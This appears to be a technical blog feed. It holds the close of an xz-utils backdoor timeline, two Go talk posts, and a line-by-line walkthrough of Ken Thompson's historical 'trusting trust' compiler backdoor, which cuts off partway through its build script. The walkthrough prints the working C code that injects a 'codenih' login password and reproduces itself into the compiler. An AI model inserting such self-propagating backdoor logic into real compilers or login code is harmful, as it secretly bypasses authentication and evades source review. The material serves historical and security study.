<b>2023-01-11</b>: Lasse Collin <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=18b845e69752c975dfeda418ec00eda22605c2ee">tags and builds his final release</a>, v5.4.1.
<p>
<b>2023-03-18</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6ca8046ecbc7a1c81ee08f544bfd1414819fb2e8">tags and builds their first release</a>, v5.4.2.
<p>
<b>2023-03-20</b>: Jia Tan <a href="https://github.com/google/oss-fuzz/commit/6403e93344476972e908ce17e8244f5c2b957dfd">updates Google oss-fuzz configuration</a> to send bugs to them.
<p>
<b>2023-06-22</b>: Hans Jansen sends <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=23b5c36fb71904bfbe16bb20f976da38dadf6c3b">a pair</a> of <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=b72d21202402a603db6d512fb9271cfa83249639">patches</a>, merged by Lasse Collin, that use the “<a href="https://maskray.me/blog/2021-01-18-gnu-indirect-function">GNU indirect function</a>” feature to select a fast CRC function at startup time. The final commit is <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=ee44863ae88e377a5df10db007ba9bfadde3d314">reworked by Lasse Collin</a> and merged by Jia Tan. This change is important because it provides a hook by which the backdoor code can modify the global function tables before they are remapped read-only. While this change could be an innocent performance optimization by itself, Hans Jansen returns in 2024 to promote the backdoored xz and otherwise does not exist on the internet.
<p>
<b>2023-07-07</b>: Jia Tan <a href="https://github.com/google/oss-fuzz/commit/d2e42b2e489eac6fe6268e381b7db151f4c892c5">disables ifunc support during oss-fuzz builds</a>, claiming ifunc is incompatible with address sanitizer. This may well be innocuous on its own, although it is also more groundwork for using ifunc later.
<p>
<b>2024-01-19</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=c26812c5b2c8a2a47f43214afe6b0b840c73e4f5">moves web site to GitHub pages</a>, giving them control over the XZ Utils web page. Lasse Collin presumably created the DNS records for the xz.tukaani.org subdomain that points to GitHub pages. After the attack was discovered, Lasse Collin deleted this DNS record to move back to <a href="https://tukaani.org">tukaani.org</a>, which he controls.
<a class=anchor href="#attack_begins"><h2 id="attack_begins">Attack begins</h2></a>
<p>
<b>2024-02-23</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0">merges hidden backdoor binary code</a> well hidden inside some binary test input files. The README already said (from long before Jia Tan showed up) “This directory contains bunch of files to test handling of .xz, .lzma (LZMA_Alone), and .lz (lzip) files in decoder implementations. Many of the files have been created by hand with a hex editor, thus there is no better “source code” than the files themselves.” Having these kinds of test files is very common for this kind of library. Jia Tan took advantage of this to add a few files that wouldn’t be carefully reviewed.
<p>
<b>2024-02-24</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=2d7d862e3ffa8cec4fd3fdffcd84e984a17aa429">tags and builds v5.6.0</a> and publishes an xz-5.6.0.tar.gz distribution with an extra, malicious build-to-host.m4 that adds the backdoor when building a deb/rpm package. This m4 file is not present in the source repository, but many other legitimate ones are added during package as well, so it’s not suspicious by itself. But the script has been modified from the usual copy to add the backdoor. See my <a href="xz-script">xz attack shell script walkthrough post</a> for more.
<p>
<b>2024-02-24</b>: Gentoo <a href="https://bugs.gentoo.org/925415">starts seeing crashes in 5.6.0</a>. This seems to be an actual ifunc bug, rather than a bug in the hidden backdoor, since this is the first xz with Hans Jansen’s ifunc changes, and Gentoo does not patch sshd to use libsystemd, so it doesn’t have the backdoor.
<p>
<b>2024-02-26</b>: Debian <a href="https://tracker.debian.org/news/1506761/accepted-xz-utils-560-01-source-into-unstable/">adds xz-utils 5.6.0-0.1</a> to unstable.
<p>
<b>2024-02-27</b>: Jia Tan starts emailing Richard W.M. Jones to update Fedora 40 (privately confirmed by Rich Jones).
<p>
<b>2024-02-28</b>: Debian <a href="https://tracker.debian.org/news/1507917/accepted-xz-utils-560-02-source-into-unstable/">adds xz-utils 5.6.0-0.2</a> to unstable.
<p>
<b>2024-02-28</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=a100f9111c8cc7f5b5f0e4a5e8af3de7161c7975">breaks landlock detection</a> in configure script by adding a subtle typo in the C program used to check for <a href="https://docs.kernel.org/userspace-api/landlock.html">landlock support</a>. The configure script tries to build and run the C program to check for landlock support, but since the C program has a syntax error, it will never build and run, and the script will always decide there is no landlock support. Lasse Collin is listed as the committer; he may have missed the subtle typo, or the author may be forged. Probably the former, since Jia Tan did not bother to forge committer on his many other changes. This patch seems to be setting up for something besides the sshd change, since landlock support is part of the xz command and not liblzma. Exactly what is unclear.
<p>
<b>2024-02-29</b>: On GitHub, @teknoraver <a href="https://github.com/systemd/systemd/pull/31550">sends pull request</a> to stop linking liblzma into libsystemd. It appears that this would have defeated the attack. <a href="https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd">Kevin Beaumont speculates</a> that knowing this was on the way may have accelerated the attacker’s schedule. @teknoraver <a href="https://news.ycombinator.com/item?id=39916125">commented on HN</a> that the liblzma PR was one in a series of dependency slimming changes for libsystemd; there were <a href="https://github.com/systemd/systemd/pull/31131#issuecomment-1917693005">two</a> <a href="https://github.com/systemd/systemd/pull/31131#issuecomment-1918667390">mentions</a> of it in late January.
<p>
<b>2024-03-04</b>: RedHat distributions <a href="https://bugzilla.redhat.com/show_bug.cgi?id=2267598">start seeing Valgrind errors</a> in liblzma’s <code>_get_cpuid</code> (the entry to the backdoor). The race is on to fix this before the Linux distributions dig too deeply.
<p>
<b>2024-03-05</b>: The <a href="https://github.com/systemd/systemd/commit/3fc72d54132151c131301fc7954e0b44cdd3c860">libsystemd PR is merged</a> to remove liblzma. Another race is on, to get liblzma backdoor’ed before the distros break the approach entirely.
<p>
<b>2024-03-05</b>: Debian <a href="https://tracker.debian.org/news/1509743/xz-utils-560-02-migrated-to-testing/">adds xz-utils 5.6.0-0.2</a> to testing.
<p>
<b>2024-03-05</b>: Jia Tan commits <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=ed957d39426695e948b06de0ed952a2fbbe84bd1">two ifunc</a> <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=4e1c97052b5f14f4d6dda99d12cbbd01e66e3712">bug fixes</a>. These seem to be real fixes for the actual ifunc bug. One commit links to the Gentoo bug and also typos an <a href="https://gcc.gnu.org/bugzilla/show_bug.cgi?id=114115">upstream GCC bug</a>.
<p>
<b>2024-03-08</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=82ecc538193b380a21622aea02b0ba078e7ade92">commits purported Valgrind fix</a>. This is a misdirection, but an effective one.
<p>
<b>2024-03-09</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">commits updated backdoor files</a>. This is the actual Valgrind fix, changing the two test files containing the attack code. “The original files were generated with random local to my machine. To better reproduce these files in the future, a constant seed was used to recreate these files.”
<p>
<b>2024-03-09</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=fd1b975b7851e081ed6e5cf63df946cd5cbdbb94">tags and build v5.6.1</a> and publishes xz 5.6.1 distribution, containing a new backdoor. To date I have not seen any analysis of how the old and new backdoors differ.
<p>
<b>2024-03-20</b>: Lasse Collin sends LKML a patch set <a href="https://lkml.org/lkml/2024/3/20/1009">replacing his personal email</a> with <a href="https://lkml.org/lkml/2024/3/20/1008">both himself and Jia Tan</a> as maintainers of the xz compression code in the kernel. There is no indication that Lasse Collin was acting nefariously here, just cleaning up references to himself as sole maintainer. Of course, Jia Tan may have prompted this, and being able to send xz patches to the Linux kernel would have been a nice point of leverage for Jia Tan’s future work. We’re not at <a href="nih">trusting trust</a> levels yet, but it would be one step closer.
<p>
<b>2024-03-25</b>: Hans Jansen is back (!), <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708">filing a Debian bug</a> to get xz-utils updated to 5.6.1. Like in the 2022 pressure campaign, more name###@mailhost addresses that don’t otherwise exist on the internet show up to advocate for it.
<p>
<b>2024-03-27</b>: Debian updates to 5.6.1.
<p>
<b>2024-03-28</b>: Jia Tan <a href="https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417">files an Ubuntu bug</a> to get xz-utils updated to 5.6.1 from Debian.
<a class=anchor href="#attack_detected"><h2 id="attack_detected">Attack detected</h2></a>
<p>
<b>2024-03-28</b>: Andres Freund discovers bug, privately notifies Debian and distros@openwall. RedHat assigns CVE-2024-3094.
<p>
<b>2024-03-28</b>: Debian <a href="https://tracker.debian.org/news/1515519/accepted-xz-utils-561really545-1-source-into-unstable/">rolls back 5.6.1</a>, introducing 5.6.1+really5.4.5-1.
<p>
<b>2024-03-28</b>: Arch Linux <a href="https://gitlab.archlinux.org/archlinux/packaging/packages/xz/-/commit/881385757abdc39d3cfea1c3e34ec09f637424ad">changes 5.6.1 to build from Git</a>.
<p>
<b>2024-03-29</b>: Andres Freund <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">posts backdoor warning</a> to public oss-security@openwall list, saying he found it “over the last weeks”.
<p>
<b>2024-03-29</b>: RedHat <a href="https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users">announces that the backdoored xz shipped</a> in Fedora Rawhide and Fedora Linux 40 beta.
<p>
<b>2024-03-30</b>: Debian <a href="https://fulda.social/@Ganneff/112184975950858403">shuts down builds</a> to rebuild their build machines using Debian stable (in case the malware xz escaped their sandbox?).
<p>
<b>2024-03-30</b>: Haiku OS <a href="https://github.com/haikuports/haikuports/commit/3644a3db2a0ad46971aa433c105e2cce9d141b46">moves to GitHub source repo snapshots</a>.
<a class=anchor href="#further_reading"><h2 id="further_reading">Further Reading</h2></a>
<ul>
<li>
Evan Boehs, <a href="https://boehs.org/node/everything-i-know-about-the-xz-backdoor">Everything I know about the XZ backdoor</a> (2024-03-29).
<li>
Filippo Valsorda, <a href="https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b">Bluesky</a> re backdoor operation (2024-03-30).
<li>
Michał Zalewski, <a href="https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor">Techies vs spies: the xz backdoor debate</a> (2024-03-30).
<li>
Michał Zalewski, <a href="https://lcamtuf.substack.com/p/oss-backdoors-the-allure-of-the-easy">OSS backdoors: the folly of the easy fix</a> (2024-03-31).
<li>
Connor Tumbleson, <a href="https://connortumbleson.com/2024/03/31/watching-xz-unfold-from-afar/">Watching xz unfold from afar</a> (2024-03-31).
<li>
nugxperience, <a href="https://twitter.com/nugxperience/status/1773906926503591970">Twitter</a> re awk and rc4 (2024-03-29)
<li>
birchb0y, <a href="https://twitter.com/birchb0y/status/1773871381890924872">Twitter</a> re time of day of commit vs level of evil (2024-03-29)
<li>
Dan Feidt, <a href="https://unicornriot.ninja/2024/xz-utils-software-backdoor-uncovered-in-years-long-hacking-plot/">‘xz utils’ Software Backdoor Uncovered in Years-Long Hacking Plot</a> (2024-03-30)
<li>
smx-smz, <a href="https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504">[WIP] XZ Backdoor Analysis and symbol mapping</a>
<li>
Dan Goodin, <a href="https://arstechnica.com/security/2024/04/what-we-know-about-the-xz-utils-backdoor-that-almost-infected-the-world/">What we know about the xz Utils backdoor that almost infected the world</a> (2024-04-01)
<li>
Akamai Security Intelligence Group, <a href="https://www.akamai.com/blog/security-research/critical-linux-backdoor-xz-utils-discovered-what-to-know">XZ Utils Backdoor — Everything You Need to Know, and What You Can Do</a> (2024-04-01)
<li>
Kevin Beaumont, <a href="https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd">Inside the failed attempt to backdoor SSH globally — that got caught by chance</a> (2024-03-31)
<li>
amlweems, <a href="https://github.com/amlweems/xzbot">xzbot: notes, honeypot, and exploit demo for the xz backdoor</a> (2024-04-01)
<li>
Rhea Karty and Simon Henniger, <a href="https://rheaeve.substack.com/p/xz-backdoor-times-damned-times-and">XZ Backdoor: Times, damned times, and scams</a> (2024-03-30)
<li>
Andy Greenberg and Matt Burgess, <a href="https://www.wired.com/story/jia-tan-xz-backdoor/">The Mystery of ‘Jia Tan,’ the XZ Backdoor Mastermind</a> (2024-04-03)
<li>
<a href="https://risky.biz/RB743/">Risky Business #743 -- A chat about the xz backdoor with the guy who found it</a> (2024-04-03)</ul>
Go Changestag:research.swtch.com,2012:research.swtch.com/gochanges2023-12-08T12:00:00-05:002023-12-08T12:02:00-05:00The way Go changes, and how to improve it with telemetry.
<p>
I opened GopherCon (USA) in October with the talk “Go Changes”,
which looked at how Go evolves, the importance of data in making shared decisions,
and why opt-in telemetry in the Go toolchain
is a useful, effective, and appropriate new source of data.
<p>
I re-recorded it at home and have posted it here:
<div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;">
<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/BNmxtp26I5s?si=3ZpIWEA72ehzJrVO" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
</div>
<p>
Links:
<ul>
<li>
<a href="https://go.dev/s/proposal">The Go Proposal Process</a>
<li>
<a href="sample">The Magic of Sampling</a>
<li>
<a href="telemetry">Go Telemetry Blog Posts</a></ul>
<p>
Errata:
<ul>
<li>
There is a mistake in the probability discussion: (2/3)<sup>100</sup> is about 2.46×10<sup>–18</sup>, not 1.94×10<sup>–48</sup>. The latter is (1/3)<sup>100</sup>. The probability of pulling 100 gophers without getting the third color remains vanishingly small. Apologies for the mistake.</ul>
Go Testing By Exampletag:research.swtch.com,2012:research.swtch.com/testing2023-12-05T08:00:00-05:002023-12-05T08:02:00-05:00The importance of testing, and twenty tips for writing good tests.
<p>
I opened GopherCon Australia in early November with the talk “Go Testing By Example”.
Being the first talk, there were some A/V issues, so I re-recorded it at home and have posted it here:
<div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;">
<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/X4rxi9jStLo?si=DJiEGUPNxPlYnlWL" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
</div>
<p>
Here are the 20 tips from the talk:
<ol>
<li>
Make it easy to add new test cases.
<li>
Use test coverage to find untested code.
<li>
Coverage is no substitute for thought.
<li>
Write exhaustive tests.
<li>
Separate test cases from test logic.
<li>
Look for special cases.
<li>
If you didn’t add a test, you didn’t fix the bug.
<li>
Not everything fits in a table.
<li>
Test cases can be in testdata files.
<li>
Compare against other implementations.
<li>
Make test failures readable.
<li>
If the answer can change, write code to update them.
<li>
Use <a href="https://pkg.go.dev/golang.org/x/tools/txtar">txtar</a> for multi-file test cases.
<li>
Annotate existing formats to create testing mini-languages.
<li>
Write parsers and printers to simplify tests.
<li>
Code quality is limited by test quality.
<li>
Scripts make good tests.
<li>
Try <a href="https://pkg.go.dev/rsc.io/script">rsc.io/script</a> for your own script-based test cases.
<li>
Improve your tests over time.
<li>
Aim for continuous deployment.</ol>
<p>
Enjoy!
Running the “Reflections on Trusting Trust” Compilertag:research.swtch.com,2012:research.swtch.com/nih2023-10-25T21:00:00-04:002023-10-25T21:00:00-04:00Ken Thompson’s Turing award lecture, running in your browser.
<style>
body { font-family: 'Minion 3'; }
.nih pre { padding-top: 0.2em; margin: 0; }
.nih { border-spacing: 0; }
.nih tr { padding: 0; }
.nih td { padding: 0.5em; min-width: 25em; }
.nih td { vertical-align: top; }
.nih td.l { font-style: italic; }
.nih td.r { background-color: #eee; }
.nih td p { text-align: right; clear: both; margin-block-start: 0; margin-block-end: 0; }
.nih td div { float: right; }
.string { color: #700; }
.del { color: #aaa; }
.ins { font-weight: bold; }
</style>
<p>
Supply chain security is a hot topic today, but it is a very old problem.
In October 1983, 40 years ago this week,
Ken Thompson chose supply chain security as the topic for his Turing award lecture,
although the specific term wasn’t used back then.
(The field of computer science was still young and small enough that the ACM conference where Ken spoke was
the “Annual Conference on Computers.”)
Ken’s lecture was later published in <i>Communications of the ACM</i>
under the title “<a href="https://dl.acm.org/doi/pdf/10.1145/358198.358210">Reflections on Trusting Trust</a>.”
It is a classic paper, and a short one (3 pages);
if you haven’t read it yet, you should. This post will still be here when you get back.
</p>
<p>
In the lecture, Ken explains in three steps how to modify a C compiler binary
to insert a backdoor when compiling the “login” program,
leaving no trace in the source code.
In this post, we will run the backdoored compiler using Ken’s actual code.
But first, a brief summary of the important parts of the lecture.
</p>
<a class=anchor href="#step1"><h2 id="step1">Step 1: Write a Self-Reproducing Program</h2></a>
<p>
Step 1 is to write a program that prints its own source code.
Although the technique was not widely known in 1975,
such a program is now known in computing as a “<a href="https://en.wikipedia.org/wiki/Quine_(computing)">quine</a>,”
popularized by Douglas Hofstadter in <i>Gödel, Escher, Bach</i>.
Here is a Python quine, from <a href="https://cs.lmu.edu/~ray/notes/quineprograms/">this collection</a>:
</p>
<pre>
s=<span class="string">’s=%r;print(s%%s)’</span>;print(s%s)
</pre>
<p>
And here is a slightly less cryptic Go quine:
</p>
<pre>
package main
func main() { print(q + "\x60" + q + "\x60") }
var q = <span class=string>`package main
func main() { print(q + "\x60" + q + "\x60") }
var q = `</span>
</pre>
<p>The general idea of the solution is to put the text of the program into a string literal, with some kind of placeholder where the string itself should be repeated. Then the program prints the string literal, substituting that same literal for the placeholder.
In the Python version, the placeholder is <code>%r</code>;
in the Go version, the placeholder is implicit at the end of the string.
For more examples and explanation, see my post “<a href="zip">Zip Files All The Way Down</a>,” which uses a Lempel-Ziv quine to construct a zip file that contains itself.
</p>
<a class=anchor href="#step2"><h2 id="step2">Step 2: Compilers Learn</h2></a>
<p>
Step 2 is to notice that when a compiler compiles itself,
there can be important details that persist only in the compiler
binary, not in the actual source code.
Ken gives the example of the numeric values of escape sequences in C strings.
You can imagine a compiler containing code like this during
the processing of escaped string literals:
</p>
<pre>
c = next();
if(c == '\\') {
c = next();
if(c == 'n')
c = '\n';
}
</pre>
<p>
That code is responsible for processing the two character sequence <code>\n</code>
in a string literal
and turning it into a corresponding byte value,
specifically <code>’\n’</code>.
But that’s a circular definition, and the first time you write code like that it won’t compile.
So instead you write <code>c = 10</code>,
you compile and install the compiler, and <i>then</i> you can change
the code to <code>c = ’\n’</code>.
The compiler has “learned” the value of <code>’\n’</code>,
but that value only appears in the compiler binary,
not in the source code.
</p>
<a class=anchor href="#step3"><h2 id="step3">Step 3: Learn a Backdoor</h2></a>
<p>
Step 3 is to put these together to help the compiler “learn”
to miscompile the target program (<code>login</code> in the lecture).
It is fairly straightforward to write code in a compiler
to recognize a particular input program and modify its code,
but that code would be easy to find if the compiler source were inspected.
Instead, we can go deeper, making two changes to the compiler:
</p>
<ol>
<li>Recognize <code>login</code> and insert the backdoor.
<li>Recognize the compiler itself and insert the code for these two changes.
</ol>
<p>
The “insert the code for these two changes” step requires being able to write
a self-reproducing program: the code must reproduce itself
into the new compiler binary.
At this point, the compiler binary has “learned” the miscompilation steps,
and the clean source code can be restored.
</p>
<a class=anchor href="#run"><h2 id="run">Running the Code</h2></a>
<p>At the Southern California Linux Expo in March 2023,
Ken gave the closing keynote,
<a href="https://www.youtube.com/live/kaandEt_pKw?si=RGKrC8c0B9_AdQ9I&t=643">a delightful talk</a>
about his 75-year effort accumulating what must be the world’s
largest privately held digital music collection,
complete with actual jukeboxes and a player piano (video opens at 10m43s, when his talk begins).
During the Q&A session, someone <a href="https://www.youtube.com/live/kaandEt_pKw?si=koOlE35Q3mjqH4yf&t=3284">jokingly asked</a> about the Turing award lecture, specifically
“can you tell us right now whether you have a backdoor into every copy of gcc and Linux still today?”
Ken replied:
</p>
<blockquote>
I assume you’re talking about some paper I wrote a long time ago.
No, I have no backdoor.
That was very carefully controlled, because there were some spectacular fumbles before that.
I got it released, or I got somebody to steal it from me, in a very controlled sense,
and then tracked whether they found it or not.
And they didn’t.
But they broke it, because of some technical effect,
but they didn’t find out what it was and then track it.
So it never got out, if that’s what you’re talking about.
I hate to say this in front of a big audience, but
the one question I’ve been waiting for since I wrote that paper is
“you got the code?”
Never been asked.
I still have the code.
</blockquote>
<p>Who could resist that invitation!?
Immediately after watching the video on YouTube in September 2023,
I emailed Ken and asked him for the code.
Despite my being six months late, he said I was the first person to ask
and mailed back an attachment called <code>nih.a</code>,
a cryptic name for a cryptic program.
(Ken tells me it does in fact stand for “not invented here.”)
Normally today, <code>.a</code> files are archives containing
compiler object files,
but this one contains two source files.</p>
<p>
The code applies cleanly to the C compiler from the
<a href="https://en.wikipedia.org/wiki/Research_Unix">Research Unix Sixth Edition (V6)</a>.
I’ve posted an online emulator that runs V6 Unix programs
and populated it with some old files from Ken and Dennis,
including <code>nih.a</code>.
Let’s actually run the code.
You can <a href="https://research.swtch.com/v6">follow along in the simulator</a>.</p>
<table class="nih">
<tr>
<td class=l>
<p>Login as <code>ken</code>, password <code>ken</code>.<br>
(The password is normally not shown.)
<td class=r><pre>login: <b>ken</b>
Password: <b>ken</b>
% <b>who</b>
ken tty8 Aug 14 22:06
%
</pre>
<tr>
<td class=l>
<p>Change to and list the <code>nih</code> directory,<br>
discovering a Unix archive.
<td class=r><pre>
% <b>chdir nih</b>
% <b>ls</b>
nih.a
</pre>
<tr>
<td class=l>
<p>Extract <code>nih.a</code>.
<td class=r><pre>
% <b>ar xv nih.a</b>
x x.c
x rc
</pre>
<tr>
<td class=l>
<p>Let’s read <code>x.c</code>, a C program.
<td class=r><pre>
% <b>cat x.c</b>
</pre>
<tr>
<td class=l>
<p>Declare the global variable <code>nihflg</code>,<br>
of implied type <code>int</code>.
<td class=r><pre>
nihflg;
</pre>
<tr>
<td class=l>
<p>
Define the function <code>codenih</code>, with implied<br>
return type <code>int</code> and no arguments.<br>
The compiler will be modified to call <code>codenih</code><br>
during preprocessing, for each input line.
<td class=r><pre>
codenih()
{
char *p,*s;
int i;
</pre>
<tr>
<td class=l>
<p><code>cc -p</code> prints the preprocessor output<br>
instead of invoking the compiler back end.<br>
To avoid discovery, do nothing when <code>-p</code> is used.<br>
The implied return type of <code>codenih</code> is <code>int</code>,<br>
but early C allowed omitting the return value.
<td class=r><pre>
if(pflag)
return;
</pre>
<tr>
<td class=l>
<p>Skip leading tabs in the line.
<td class=r><pre>
p=line;
while(*p=='\t')
p++;
</pre>
<tr>
<td class=l>
<p>Look for the line<br>
“<code>name = crypt(pwbuf);</code>” from <a href="login.c#crypt"><code>login.c</code></a>.<br>
If not found, jump to <code>l1</code>.
<td class=r><pre>
s="namep = crypt(pwbuf);";
for(i=0;i<21;i++)
if(s[i]!=p[i])
goto l1;
</pre>
<tr>
<td class=l>
<p>Define <code>login</code> backdoor code <code>s</code>, which does:<br>
Check for the password “<code>codenih</code>”.<br>
If found, modify <code>namep</code> and <code>np</code><br>
so that the code that follows in <br>
<a href="login.c#crypt"><code>login.c</code></a> will accept the password.
<td class=r><pre>
p=+i;
s="for(c=0;c<8;c++)"
"if(\"codenih\"[c]!=pwbuf[c])goto x1x;"
"while(*namep)namep++;"
"while(*np!=':')np++;x1x:";
</pre>
<tr>
<td class=l>
<p>With the <code>p=+i</code> from above,<br>
this is: <code>strcpy(p+i, s); return;</code>,<br>
appending the backdoor to the line.<br>
In early C, <code>+=</code> was spelled <code>=+</code>.<br>
The loop is <code>strcpy</code>, and <code>goto l4</code><br>
jumps to the end of the function.
<td class=r><pre>
for(i=0;;i++)
if(!(*p++=s[i]))
break;
goto l4;
</pre>
<tr>
<td class=l>
<p>No match for <code>login</code> code. Next target:<br>
the distinctive line “<code>av[4] = "-P";</code>”<br>
from <a href="cc.c#av4">cc.c</a>. If not found, jump to <code>l2</code>.
<td class=r><pre>
l1:
s="av[4] = \"-P\";";
for(i=0;i<13;i++)
if(s[i]!=p[i])
goto l2;
</pre>
<tr>
<td class=l>
<p>Increment <code>nihflg</code> to 1 to remember<br>
evidence of being in <code>cc.c</code>, and return.
<td class=r><pre>
nihflg++;
goto l4;
</pre>
<tr>
<td class=l>
<p>
Next target: <a href="cc.c#getline">input reading loop in <code>cc.c</code></a>,<br>
but only if we’ve seen the <code>av[4]</code> line too:<br>
the text “<code>while(getline()) {</code>”<br>
is too generic and may be in other programs.<br>
If not found, jump to <code>l3</code>.
<td class=r><pre>
l2:
if(nihflg!=1)
goto l3;
s="while(getline()) {";
for(i=0;i<18;i++)
if(s[i]!=p[i])
goto l3;
</pre>
<tr>
<td class=l>
<p>
Append input-reading backdoor: call <code>codenih</code><br>
(this very code!) after reading each line.<br>
Increment <code>nihflg</code> to 2 to move to next state.
<td class=r><pre>
p=+i;
s="codenih();";
for(i=0;;i++)
if(!(*p++=s[i]))
break;
nihflg++;
goto l4;
</pre>
<tr>
<td class=l>
<p>Next target: <a href="cc.c#fflush">flushing output in <code>cc.c</code></a>.
<td class=r><pre>
l3:
if(nihflg!=2)
goto l4;
s="fflush(obuf);";
for(i=0;i<13;i++)
if(s[i]!=p[i])
goto l4;
</pre>
<tr>
<td class=l>
<p>Insert end-of-file backdoor: call <code>repronih</code><br>
to reproduce this very source file<br>
(the definitions of <code>codenih</code> and <code>repronih</code>)<br>
at the end of the now-backdoored text of <code>cc.c</code>.
<td class=r><pre>
p=+i;
s="repronih();";
for(i=0;;i++)
if(!(*p++=s[i]))
break;
nihflg++;
l4:;
}
</pre>
<tr>
<td class=l>
<p>Here the magic begins, as presented in the<br>
Turing lecture. The <code>%0</code> is not valid C.<br>
Instead, the script <code>rc</code> will replace the <code>%</code><br>
with byte values for the text of this exact file,<br>
to be used by <code>repronih</code>.
<td class=r><pre>
char nihstr[]
{
%0
};
</pre>
<tr>
<td class=l>
<p>The magic continues.<br>
<td class=r><pre>
repronih()
{
int i,n,c;
</pre>
<tr>
<td class=l>
<p>If <code>nihflg</code> is not 3, this is not <code>cc.c</code><br>
so don’t do anything.
<td class=r><pre>
if(nihflg!=3)
return;
</pre>
<tr>
<td class=l>
<p>The most cryptic part of the whole program.<br>
Scan over <code>nihstr</code> (indexed by <code>i</code>)<br>
in five phases according to the value <code>n</code>:
<div>
<code>n=0</code>: emit literal text before “<code>%</code>”<br>
<code>n=1</code>: emit octal bytes of text before “<code>%</code>”<br>
<code>n=2</code>: emit octal bytes of “<code>%</code>” and rest of file<br>
<code>n=3</code>: no output, looking for “<code>%</code>”<br>
<code>n=4</code>: emit literal text after “<code>%</code>”<br>
</div>
<td class=r><pre>
n=0;
i=0;
for(;;)
switch(c=nihstr[i++]){
</pre>
<tr>
<td class=l>
<p><code>045</code> is <code>'%'</code>, kept from appearing<br>
except in the magic location inside <code>nihstr</code>.<br>
Seeing <code>%</code> increments the phase.<br>
The phase transition 0 → 1 rewinds the input.<br>
Only phase 2 keeps processing the <code>%.</code>
<td class=r><pre>
case 045:
n++;
if(n==1)
i=0;
if(n!=2)
continue;
</pre>
<tr>
<td class=l>
<p>In phases 1 and 2, emit octal byte value<br>
(like <code>0123,</code>) to appear inside <code>nihstr</code>.</code><br>
Note the comma to separate array elements,<br>
so the <code>0</code> in <code>nihstr</code>’s <code>%0</code> above is a final,<br>
terminating NUL byte for the array.
<td class=r><pre>
default:
if(n==1||n==2){
putc('0',obuf);
if(c>=0100)
putc((c>>6)+'0',obuf);
if(c>=010)
putc(((c>>3)&7)+'0',obuf);
putc((c&7)+'0',obuf);
putc(',',obuf);
putc('\n',obuf);
continue;
}
</pre>
<tr>
<td class=l>
<p>In phases 0 and 4, emit literal byte value,<br>
to reproduce source file around the <code>%</code>.<br>
<td class=r><pre>
if(n!=3)
putc(c,obuf);
continue;
</pre>
<tr>
<td class=l>
<p>Reaching end of <code>nihstr</code> increments the phase<br>
and rewinds the input.<br>
The phase transition 4 → 5 ends the function.</code>
<td class=r><pre>
case 0:
n++;
i=0;
if(n==5){
fflush(obuf);
return;
}
}
}
</pre>
<tr>
<td class=l>
<p>Now let’s read <code>rc</code>, a shell script.
<td class=r><pre>
% <b>cat rc</b>
</pre>
<tr>
<td class=l>
<p>Start the editor <code>ed</code> on <code>x.c</code>.<br>
The V6 shell <code>sh</code> opened<br>
input scripts on standard input,<br>
sharing it with invoked commands,<br>
so the lines that follow are for <code>ed</code>.
<td class=r><pre>
ed x.c
</pre>
<tr>
<td class=l>
<p>Delete all tabs from every line.
<td class=r><pre>
1,$s/ //g
</pre>
<tr>
<td class=l>
<p>Write the modified file to <code>nih.c</code> and quit.<br>
The shell will continue reading the input script.
<td class=r><pre>
w nih.c
q
</pre>
<tr>
<td class=l>
<p>Octal dump bytes of <code>nih.c</code> into <code>x</code>.<br>
The output looks like:
</p>
<div><code>% echo az | od -b<br>
0000000 141 172 012 000<br>
0000003 <br>
%<br>
</code></div>
<p>Note the trailing <code>000</code> for an odd-sized input.<br>
</code></div>
</pre>
<td class=r><pre>
od -b nih.c >x
</pre>
<tr>
<td class=l>
<p>Back into <code>ed</code>, this time editing <code>x</code>.
<td class=r><pre>
ed x
</pre>
<tr>
<td class=l>
<p>Remove the leading file offsets, adding a <code>0</code><br>
at the start of the first byte value.
<td class=r><pre>
1,$s/^....... 0*/0/
</pre>
<tr>
<td class=l>
<p>Replace each space before a byte value<br>
with a newline and a leading <code>0</code>.<br>
Now all the octal values are C octal constants.
<td class=r><pre>
1,$s/ 0*/\
0/g
</pre>
<tr>
<td class=l>
<p>Delete 0 values caused by odd-length padding<br>
or by the final offset-only line.
<td class=r><pre>
g/^0$/d
</pre>
<tr>
<td class=l>
<p>Add trailing commas to each line.
<td class=r><pre>
